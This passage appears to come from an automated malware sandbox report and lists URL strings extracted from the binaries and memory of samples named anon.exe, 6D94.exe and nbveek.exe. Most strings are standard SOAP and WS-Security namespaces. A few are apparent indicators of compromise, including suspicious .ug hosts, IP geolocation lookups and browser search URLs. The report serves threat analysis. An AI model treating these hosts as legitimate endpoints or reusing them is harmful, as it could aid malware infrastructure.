                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                                Source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                                Source: anon.exe, 0000001D.00000002.852514315.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                                Source: anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                                Source: anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                                Source: anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                                Source: anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                                Source: anon.exe, 0000001D.00000002.852786010.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852514315.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                                Source: anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                                Source: anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                                Source: anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                                Source: anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                                Source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                                Source: anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: nbveek.exe, 0000000F.00000002.836273955.000000000138A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                                Source: 6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                                Source: nbveek.exe, 0000000F.00000003.499378760.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000000.496552203.00000000007D2000.00000002.00000001.01000000.00000010.sdmp, nbveek.exe, 0000001F.00000002.569124856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, anon.exe.15.drString found in binary or memory: https://api.ip.sb/ip
                                Source: anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: anon.exe, 0000001D.00000002.904317536.00000000060FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                                Source: anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: anon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
